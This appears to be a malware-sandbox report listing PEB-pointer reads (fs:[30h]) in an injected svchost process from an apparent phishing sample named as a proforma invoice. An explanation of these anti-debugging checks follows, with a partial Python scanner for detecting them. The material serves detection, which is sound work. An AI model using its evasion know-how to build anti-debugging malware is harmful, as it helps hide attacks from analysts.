                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E47A0 mov eax, dword ptr fs:[00000030h]2_2_033E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D678E mov eax, dword ptr fs:[00000030h]2_2_033D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE7E1 mov eax, dword ptr fs:[00000030h]2_2_033BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333C7C0 mov eax, dword ptr fs:[00000030h]2_2_0333C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B07C3 mov eax, dword ptr fs:[00000030h]2_2_033B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E627 mov eax, dword ptr fs:[00000030h]2_2_0334E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03366620 mov eax, dword ptr fs:[00000030h]2_2_03366620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368620 mov eax, dword ptr fs:[00000030h]2_2_03368620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333262C mov eax, dword ptr fs:[00000030h]2_2_0333262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372619 mov eax, dword ptr fs:[00000030h]2_2_03372619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE609 mov eax, dword ptr fs:[00000030h]2_2_033AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03362674 mov eax, dword ptr fs:[00000030h]2_2_03362674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334C640 mov eax, dword ptr fs:[00000030h]2_2_0334C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033666B0 mov eax, dword ptr fs:[00000030h]2_2_033666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C6A6 mov eax, dword ptr fs:[00000030h]2_2_0336C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0336A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A6C7 mov eax, dword ptr fs:[00000030h]2_2_0336A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6500 mov eax, dword ptr fs:[00000030h]2_2_033C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]2_2_03338550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]2_2_03338550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]2_2_033545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]2_2_033545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E59C mov eax, dword ptr fs:[00000030h]2_2_0336E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332582 mov eax, dword ptr fs:[00000030h]2_2_03332582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332582 mov ecx, dword ptr fs:[00000030h]2_2_03332582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364588 mov eax, dword ptr fs:[00000030h]2_2_03364588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033325E0 mov eax, dword ptr fs:[00000030h]2_2_033325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]2_2_0336C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]2_2_0336C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033365D0 mov eax, dword ptr fs:[00000030h]2_2_033365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]2_2_0336A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]2_2_0336A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]2_2_0336E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]2_2_0336E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A430 mov eax, dword ptr fs:[00000030h]2_2_0336A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C427 mov eax, dword ptr fs:[00000030h]2_2_0332C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC460 mov ecx, dword ptr fs:[00000030h]2_2_033BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA456 mov eax, dword ptr fs:[00000030h]2_2_033EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332645D mov eax, dword ptr fs:[00000030h]2_2_0332645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335245A mov eax, dword ptr fs:[00000030h]2_2_0335245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033644B0 mov ecx, dword ptr fs:[00000030h]2_2_033644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BA4B0 mov eax, dword ptr fs:[00000030h]2_2_033BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033364AB mov eax, dword ptr fs:[00000030h]2_2_033364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA49A mov eax, dword ptr fs:[00000030h]2_2_033EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033304E5 mov ecx, dword ptr fs:[00000030h]2_2_033304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]2_2_0335EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]2_2_0335EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]2_2_033F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]2_2_033F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332CB7E mov eax, dword ptr fs:[00000030h]2_2_0332CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEB50 mov eax, dword ptr fs:[00000030h]2_2_033DEB50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033FAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033D8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0335EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033DEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0335EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03386AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03368A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03404A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03330AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03328918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0337096E mov eax, dword ptr fs:[00000030h] (2 occurrences); mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B89B3 mov esi, dword ptr fs:[00000030h]; mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h] (5 occurrences); mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033D483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BE872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033C6870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03360854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03334859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03342840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03330887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033FA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0335E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0335EF28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03332F12 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03404F68 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336CF1F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002A80A9 GetTokenInformation, GetLastError, GetProcessHeap, HeapAlloc, GetTokenInformation
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_0027A124 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_0027A155 SetUnhandledExceptionFilter, UnhandledExceptionFilter
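The fs:[00000030h] reads listed above are loads of the PEB pointer from the 32-bit TEB. Once code holds the PEB it can test BeingDebugged (+0x02) and NtGlobalFlag (+0x68) or walk Ldr (+0x0C) to resolve APIs without an import table, which is why the sandbox files these under anti-debugging. The following Python scanner is an added example, not Joe Sandbox code: it finds the two common IA-32 encodings of that instruction in a raw code dump, attributes each hit to a register as the report does per function, and emits an equivalent YARA rule. The sample bytes are constructed, the base address 0x03336A50 is borrowed from one of the functions listed above, and the YARA count threshold is an assumption to tune. Two caveats: CRT start-up and loader code also read the PEB, so a hit count alone is weak evidence, and in a 64-bit process the pointer sits at gs:[60h] with a different encoding that this pattern does not cover.

```python
"""Find `mov r32, dword ptr fs:[30h]` (PEB pointer reads) in a 32-bit code dump.
Added example for this report, not Joe Sandbox code; the sample bytes are constructed."""
import re
from collections import Counter

# Register order of the ModRM reg field for the `8B /r` form.
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Two common encodings (prefix 0x64 selects FS; disp32 = 0x30):
#   64 A1 30 00 00 00        mov eax, fs:[30h]   (moffs32 short form, eax only)
#   64 8B /r 30 00 00 00     mov r32, fs:[30h]   (ModRM = 0x05 | reg << 3; esp/ebp omitted)
PEB_READ = re.compile(rb"\x64(?:\xA1|\x8B([\x05\x0D\x15\x1D\x35\x3D]))\x30\x00\x00\x00")

# Constructed fragment: the three PEB fields anti-debug code usually reads, plus a
# TEB self-pointer read (fs:[18h]) that must NOT be reported.
SAMPLE = (
    b"\x55\x8B\xEC"                    # push ebp; mov ebp, esp
    b"\x64\xA1\x30\x00\x00\x00"        # mov eax, fs:[30h]            -> PEB
    b"\x0F\xB6\x40\x02"                # movzx eax, byte [eax+2]       PEB.BeingDebugged
    b"\x85\xC0"                        # test eax, eax
    b"\x64\x8B\x15\x30\x00\x00\x00"    # mov edx, fs:[30h]
    b"\x8B\x52\x0C"                    # mov edx, [edx+0Ch]            PEB.Ldr
    b"\x64\x8B\x0D\x30\x00\x00\x00"    # mov ecx, fs:[30h]
    b"\x8B\x49\x68"                    # mov ecx, [ecx+68h]            PEB.NtGlobalFlag
    b"\x64\xA1\x18\x00\x00\x00"        # mov eax, fs:[18h]             TEB self pointer
    b"\xC3"                            # ret
)


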